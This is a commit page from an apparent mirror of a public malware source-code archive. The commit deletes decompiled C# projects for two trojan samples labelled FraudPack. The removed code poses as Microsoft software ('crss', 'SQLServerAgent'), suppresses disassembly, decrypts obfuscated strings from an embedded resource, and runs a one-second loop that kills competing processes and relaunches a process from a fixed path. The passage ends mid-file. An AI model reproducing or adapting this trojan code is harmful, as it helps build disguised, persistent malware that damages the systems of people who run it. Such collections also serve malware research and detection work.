Mirrors
/
vxug-MalwareSourceCode
mirror of https://github.com/vxunderground/MalwareSourceCode
13
1
Fork 0
Code Releases Activity

mov add

This commit is contained in:
vxunderground 2022-08-21 20:15:41 -05:00
parent 2e3da99359
commit 7290cd4cd5
957 changed files with 0 additions and 89491 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
MSIL/Trojan/MSIL/F/Trojan.MSIL.FraudPack.m-c9d6af6d6a8af018de78446249abcc7575778a3b852f83f32fc70008c86f78dc/AssemblyInfo.cs
View File

@ -1,16 +0,0 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
[assembly: AssemblyProduct("crss")]
[assembly: AssemblyCopyright("Copyright © Microsoft 2011")]
[assembly: AssemblyTitle("crss")]
[assembly: AssemblyCompany("Microsoft")]
[assembly: Guid("0e2e0873-244f-4dfb-9b28-b1a56e3e7bbe")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: AssemblyTrademark("")]
[assembly: ComVisible(false)]
[assembly: SuppressIldasm]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyVersion("1.0.0.0")]

51
MSIL/Trojan/MSIL/F/Trojan.MSIL.FraudPack.m-c9d6af6d6a8af018de78446249abcc7575778a3b852f83f32fc70008c86f78dc/Trojan.MSIL.FraudPack.m.csproj
View File

@ -1,51 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.FraudPack.m-c9d6af6d6a8af018de78446249abcc7575778a3b852f83f32fc70008c86f78dc.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{FFB15BCA-D8E5-4BDB-8521-51779612FEA1}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>crss</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="_0002.cs" />
<Compile Include="_0003.cs" />
<Compile Include="_0005.cs" />
<Compile Include="_0006.cs" />
<Compile Include="_0008.cs" />
<Compile Include="crss\Properties\Settings.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="   " />
<EmbeddedResource Include="_0003.resx" />
<EmbeddedResource Include="crss\Properties\Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>

20
MSIL/Trojan/MSIL/F/Trojan.MSIL.FraudPack.m-c9d6af6d6a8af018de78446249abcc7575778a3b852f83f32fc70008c86f78dc/Trojan.MSIL.FraudPack.m.sln
View File

@ -1,20 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "crss", "Trojan.MSIL.FraudPack.m-c9d6af6d6a8af018de78446249abcc7575778a3b852f83f32fc70008c86f78dc.csproj", "{FFB15BCA-D8E5-4BDB-8521-51779612FEA1}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{FFB15BCA-D8E5-4BDB-8521-51779612FEA1}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{FFB15BCA-D8E5-4BDB-8521-51779612FEA1}.Debug|Any CPU.Build.0 = Debug|Any CPU
{FFB15BCA-D8E5-4BDB-8521-51779612FEA1}.Release|Any CPU.ActiveCfg = Release|Any CPU
{FFB15BCA-D8E5-4BDB-8521-51779612FEA1}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

33
MSIL/Trojan/MSIL/F/Trojan.MSIL.FraudPack.m-c9d6af6d6a8af018de78446249abcc7575778a3b852f83f32fc70008c86f78dc/_0002.cs
View File

@ -1,33 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: crss, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A65BA6D5-D800-4C42-A1F1-7D131391B3D8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.FraudPack.m-c9d6af6d6a8af018de78446249abcc7575778a3b852f83f32fc70008c86f78dc.exe
using System.CodeDom.Compiler;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
[DebuggerNonUserCode]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
internal sealed class \u0002
{
private static ResourceManager \u0002;
private static CultureInfo \u0003;
internal \u0002()
{
}
internal static ResourceManager \u0002()
{
if (\u0002.\u0002 == null)
\u0002.\u0002 = new ResourceManager(\u0008.\u0002(1725855201), typeof (\u0002).Assembly);
return \u0002.\u0002;
}
internal static CultureInfo \u0002() => \u0002.\u0003;
internal static void \u0002(CultureInfo _param0) => \u0002.\u0003 = _param0;
}

62
MSIL/Trojan/MSIL/F/Trojan.MSIL.FraudPack.m-c9d6af6d6a8af018de78446249abcc7575778a3b852f83f32fc70008c86f78dc/_0003.cs
View File

@ -1,62 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: crss, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A65BA6D5-D800-4C42-A1F1-7D131391B3D8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.FraudPack.m-c9d6af6d6a8af018de78446249abcc7575778a3b852f83f32fc70008c86f78dc.exe
using System;
using System.ComponentModel;
using System.Drawing;
using System.Windows.Forms;
public sealed class \u0003 : Form
{
private IContainer \u0002 = (IContainer) null;
private Button \u0003;
private TextBox \u0005;
public \u0003() => this.\u0002();
protected override void Dispose(bool _param1)
{
if (_param1 && this.\u0002 != null)
this.\u0002.Dispose();
base.Dispose(_param1);
}
private void \u0002()
{
this.\u0003 = new Button();
this.\u0005 = new TextBox();
this.SuspendLayout();
this.\u0003.Location = new Point(115, 187);
this.\u0003.Name = \u0008.\u0002(1725855169);
this.\u0003.Size = new Size(75, 23);
this.\u0003.TabIndex = 0;
this.\u0003.Text = \u0008.\u0002(1725855169);
this.\u0003.UseVisualStyleBackColor = true;
this.\u0003.Click += new EventHandler(this.\u0003);
this.\u0005.Location = new Point(68, 161);
this.\u0005.Name = \u0008.\u0002(1725855191);
this.\u0005.Size = new Size(169, 20);
this.\u0005.TabIndex = 1;
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(292, 273);
this.Controls.Add((Control) this.\u0005);
this.Controls.Add((Control) this.\u0003);
this.Name = \u0008.\u0002(1725855140);
this.Text = \u0008.\u0002(1725855140);
this.Load += new EventHandler(this.\u0002);
this.ResumeLayout(false);
this.PerformLayout();
}
private void \u0002(object _param1, EventArgs _param2)
{
}
private void \u0003(object _param1, EventArgs _param2)
{
}
}

120
MSIL/Trojan/MSIL/F/Trojan.MSIL.FraudPack.m-c9d6af6d6a8af018de78446249abcc7575778a3b852f83f32fc70008c86f78dc/_0003.resx
View File

@ -1,120 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>

55
MSIL/Trojan/MSIL/F/Trojan.MSIL.FraudPack.m-c9d6af6d6a8af018de78446249abcc7575778a3b852f83f32fc70008c86f78dc/_0005.cs
View File

@ -1,55 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: crss, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A65BA6D5-D800-4C42-A1F1-7D131391B3D8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.FraudPack.m-c9d6af6d6a8af018de78446249abcc7575778a3b852f83f32fc70008c86f78dc.exe
using System;
using System.Diagnostics;
using System.IO;
using System.Security.Permissions;
using System.Timers;
using System.Windows.Forms;
internal static class \u0005
{
[STAThread]
[PermissionSet(SecurityAction.LinkDemand, XML = "<PermissionSet class=\"System.Security.PermissionSet\"\r\nversion=\"1\"/>\r\n")]
private static void \u0002()
{
string str = Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]);
Process[] processesByName = Process.GetProcessesByName(\u0008.\u0002(1725855144));
int num = 0;
for (int index = 0; index < processesByName.Length; ++index)
{
if (processesByName[index].MainModule.FileName != str + \u0008.\u0002(1725855165))
processesByName[index].Kill();
else
++num;
}
if (num >= 2)
Environment.Exit(0);
System.Timers.Timer timer = new System.Timers.Timer(1000.0);
timer.Elapsed += new ElapsedEventHandler(\u0005.\u0002);
timer.AutoReset = true;
timer.Enabled = true;
Application.Run();
}
private static void \u0002(object _param0, ElapsedEventArgs _param1)
{
string str = Convert.ToString(Path.GetPathRoot(Environment.SystemDirectory)[0]);
Process[] processesByName = Process.GetProcessesByName(\u0008.\u0002(1725855073));
bool flag = false;
for (int index = 0; index < processesByName.Length; ++index)
{
if (processesByName[index].MainModule.FileName != str + \u0008.\u0002(1725855088))
processesByName[index].Kill();
else
flag = true;
}
if (flag)
return;
Process.Start(str + \u0008.\u0002(1725855088));
}
}

31
MSIL/Trojan/MSIL/F/Trojan.MSIL.FraudPack.m-c9d6af6d6a8af018de78446249abcc7575778a3b852f83f32fc70008c86f78dc/_0006.cs
View File

@ -1,31 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: crss, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A65BA6D5-D800-4C42-A1F1-7D131391B3D8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.FraudPack.m-c9d6af6d6a8af018de78446249abcc7575778a3b852f83f32fc70008c86f78dc.exe
internal static class \u0006
{
public static byte[] \u0002(byte[] _param0, byte[] _param1)
{
byte num1 = _param0[1];
int length = _param1.Length;
byte num2 = (byte) (length + 11 ^ (int) num1 + 7);
uint num3 = (uint) (((int) _param0[0] | (int) _param0[2] << 8) + ((int) num2 << 3));
ushort num4 = 0;
for (int index = 0; index < length; ++index)
{
if ((index & 1) == 0)
{
num3 = (uint) ((int) num3 * 214013 + 2531011);
num4 = (ushort) (num3 >> 16);
}
byte num5 = (byte) num4;
num4 >>= 8;
byte num6 = _param1[index];
_param1[index] = (byte) ((uint) ((int) num6 ^ (int) num1 ^ (int) num2 + 3) ^ (uint) num5);
num2 = num6;
}
return _param1;
}
}

191
MSIL/Trojan/MSIL/F/Trojan.MSIL.FraudPack.m-c9d6af6d6a8af018de78446249abcc7575778a3b852f83f32fc70008c86f78dc/_0008.cs
View File

@ -1,191 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: crss, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A65BA6D5-D800-4C42-A1F1-7D131391B3D8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.FraudPack.m-c9d6af6d6a8af018de78446249abcc7575778a3b852f83f32fc70008c86f78dc.exe
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Text;
internal static class \u0008
{
private static readonly Dictionary<int, string> \u0002 = new Dictionary<int, string>(8);
private static BinaryReader \u0003;
private static byte[] \u0005;
private static short \u0008;
private static int \u0006;
private static byte[] \u000E;
[MethodImpl(MethodImplOptions.NoInlining)]
internal static string \u0002(int _param0)
{
lock (\u0008.\u0002)
{
string str1;
byte[] numArray1;
for (; !\u0008.\u0002.TryGetValue(_param0, out str1); _param0 = ((int) numArray1[2] | (int) numArray1[3] << 16 | (int) numArray1[0] << 8 | (int) numArray1[1] << 24) ^ -_param0)
{
if (\u0008.\u0003 == null)
{
Assembly executingAssembly = Assembly.GetExecutingAssembly();
Assembly.GetCallingAssembly();
\u0008.\u0006 = 1610370;
Stream manifestResourceStream = executingAssembly.GetManifestResourceStream("   ");
int skipFrames = 1;
StackTrace stackTrace = new StackTrace(skipFrames, false);
\u0008.\u0006 ^= 6470 | skipFrames;
int index = skipFrames - 1;
StackFrame frame = stackTrace.GetFrame(index);
MethodBase methodBase = frame == null ? (MethodBase) null : frame.GetMethod();
\u0008.\u0006 ^= index + 128;
Type type = (object) methodBase == null ? (Type) null : methodBase.DeclaringType;
if (frame == null)
\u0008.\u0006 ^= 219315;
bool flag = (object) type == (object) typeof (RuntimeMethodHandle);
\u0008.\u0006 ^= 160;
if (!flag)
{
flag = (object) type == null;
if (flag)
\u0008.\u0006 ^= 219283;
}
if (flag == (stackTrace != null))
\u0008.\u0006 ^= 32;
\u0008.\u0006 ^= 6502 | index + 1;
\u0008.\u0003 = new BinaryReader(manifestResourceStream);
short count = (short) ((int) \u0008.\u0003.ReadInt16() ^ (int) (short) ~-~--~~-~-25038);
if (count == (short) 0)
\u0008.\u0008 = (short) ((int) \u0008.\u0003.ReadInt16() ^ (int) (short) (-~-~-~~-~-351214658 ^ 351231482));
else
\u0008.\u0005 = \u0008.\u0003.ReadBytes((int) count);
Assembly assembly = executingAssembly;
AssemblyName assemblyName;
try
{
assemblyName = assembly.GetName();
}
catch
{
assemblyName = new AssemblyName(assembly.FullName);
}
\u0008.\u000E = assemblyName.GetPublicKeyToken();
if (\u0008.\u000E != null && \u0008.\u000E.Length == 0)
\u0008.\u000E = (byte[]) null;
\u0008.\u0006 = \u0008.\u0006 & 268435314 ^ 6788;
}
int num1 = _param0 ^ 1725855205;
\u0008.\u0003.BaseStream.Position = (long) num1;
byte[] numArray2;
if (\u0008.\u0005 != null)
{
numArray2 = \u0008.\u0005;
}
else
{
short count = \u0008.\u0008 != (short) -1 ? \u0008.\u0008 : (short) ((int) \u0008.\u0003.ReadInt16() ^ 23315 ^ num1);
numArray2 = count != (short) 0 ? \u0008.\u0003.ReadBytes((int) count) : (byte[]) null;
}
int num2 = \u0008.\u0003.ReadInt32() ^ num1 ^ ~--~~-~-~827774536 ^ 1596656750;
if (num2 == -2)
{
numArray1 = \u0008.\u0003.ReadBytes(4);
_param0 = -1853741605;
}
else
{
bool flag1 = (num2 & int.MinValue) != 0;
bool flag2 = (num2 & 1073741824) != 0;
int count = num2 & 1073741823;
byte[] numArray3 = \u0006.\u0002(numArray2, \u0008.\u0003.ReadBytes(count));
if (\u0008.\u000E != null != (\u0008.\u0006 != 1607814))
{
for (int index = 0; index < count; ++index)
{
byte num3 = \u0008.\u000E[index & 7];
byte num4 = (byte) ((int) num3 << 3 | (int) num3 >> 5);
numArray3[index] = (byte) ((uint) numArray3[index] ^ (uint) num4);
}
}
int num5 = \u0008.\u0006 - 12;
byte[] bytes;
int length;
if (!flag2)
{
bytes = numArray3;
length = count;
}
else
{
length = (int) numArray3[2] | (int) numArray3[0] << 16 | (int) numArray3[3] << 8 | (int) numArray3[1] << 24;
bytes = new byte[length];
\u0008.\u0002(numArray3, 4, bytes);
}
string str2;
if (flag1 && num5 == 1607802)
{
char[] chArray = new char[length];
for (int index = 0; index < length; ++index)
chArray[index] = (char) bytes[index];
str2 = new string(chArray);
}
else
str2 = Encoding.Unicode.GetString(bytes, 0, bytes.Length);
int num6 = num5 + ((int) sbyte.MaxValue + (num5 & 3) << 5);
if (num6 != 1611930)
str2 = (_param0 + count ^ 936568 ^ num6 & 1293).ToString("X");
string str3 = string.Intern(str2);
\u0008.\u0002.Add(_param0, str3);
if (\u0008.\u0002.Count == 8)
{
\u0008.\u0003.Close();
\u0008.\u0003 = (BinaryReader) null;
\u0008.\u0005 = \u0008.\u000E = (byte[]) null;
}
return str3;
}
}
return str1;
}
}
private static int \u0002(byte[] _param0, int _param1, byte[] _param2)
{
int num1 = 0;
int num2 = 0;
int num3 = 128;
int length = _param2.Length;
label_9:
while (num1 < length)
{
if ((num3 <<= 1) == 256)
{
num3 = 1;
num2 = (int) _param0[_param1++];
}
if ((num2 & num3) != 0)
{
int num4 = ((int) _param0[_param1] >> 2) + 3;
int num5 = ((int) _param0[_param1] << 8 | (int) _param0[_param1 + 1]) & 1023;
_param1 += 2;
int num6 = num1 - num5;
if (num6 < 0)
return -1;
while (true)
{
if (--num4 >= 0 && num1 < length)
_param2[num1++] = _param2[num6++];
else
goto label_9;
}
}
else
_param2[num1++] = _param0[_param1++];
}
return 0;
}
}

120
MSIL/Trojan/MSIL/F/Trojan.MSIL.FraudPack.m-c9d6af6d6a8af018de78446249abcc7575778a3b852f83f32fc70008c86f78dc/crss/Properties/Resources.resx
View File

@ -1,120 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>

28
MSIL/Trojan/MSIL/F/Trojan.MSIL.FraudPack.m-c9d6af6d6a8af018de78446249abcc7575778a3b852f83f32fc70008c86f78dc/crss/Properties/Settings.cs
View File

@ -1,28 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: crss.Properties.Settings
// Assembly: crss, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A65BA6D5-D800-4C42-A1F1-7D131391B3D8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.FraudPack.m-c9d6af6d6a8af018de78446249abcc7575778a3b852f83f32fc70008c86f78dc.exe
using System.CodeDom.Compiler;
using System.Configuration;
using System.Runtime.CompilerServices;
namespace crss.Properties
{
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "9.0.0.0")]
[CompilerGenerated]
internal sealed class Settings : ApplicationSettingsBase
{
private static Settings defaultInstance = (Settings) SettingsBase.Synchronized((SettingsBase) new Settings());
public static Settings Default
{
get
{
Settings defaultInstance = Settings.defaultInstance;
return defaultInstance;
}
}
}
}

BIN
MSIL/Trojan/MSIL/F/Trojan.MSIL.FraudPack.m-c9d6af6d6a8af018de78446249abcc7575778a3b852f83f32fc70008c86f78dc/           
View File

Binary file not shown.

16
MSIL/Trojan/MSIL/F/Trojan.MSIL.FraudPack.n-de20bb9e8ee4dc179396f640788292cd44dfb1b4244b6a8b5daa6ee32ee2733e/AssemblyInfo.cs
View File

@ -1,16 +0,0 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
[assembly: AssemblyTrademark("")]
[assembly: Guid("d9813aa2-e9b9-48ab-9e79-f7448274f278")]
[assembly: AssemblyCopyright("Copyright © Microsoft 2011")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: ComVisible(false)]
[assembly: SuppressIldasm]
[assembly: AssemblyProduct("SQLServerAgent")]
[assembly: AssemblyCompany("Microsoft")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("SQLServerAgent")]
[assembly: AssemblyVersion("1.0.0.0")]

52
MSIL/Trojan/MSIL/F/Trojan.MSIL.FraudPack.n-de20bb9e8ee4dc179396f640788292cd44dfb1b4244b6a8b5daa6ee32ee2733e/Trojan.MSIL.FraudPack.n.csproj
View File

@ -1,52 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.FraudPack.n-de20bb9e8ee4dc179396f640788292cd44dfb1b4244b6a8b5daa6ee32ee2733e.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{FAE1B1FB-B69C-47E9-8E15-4062D60056C3}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>SQLServerAgent</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
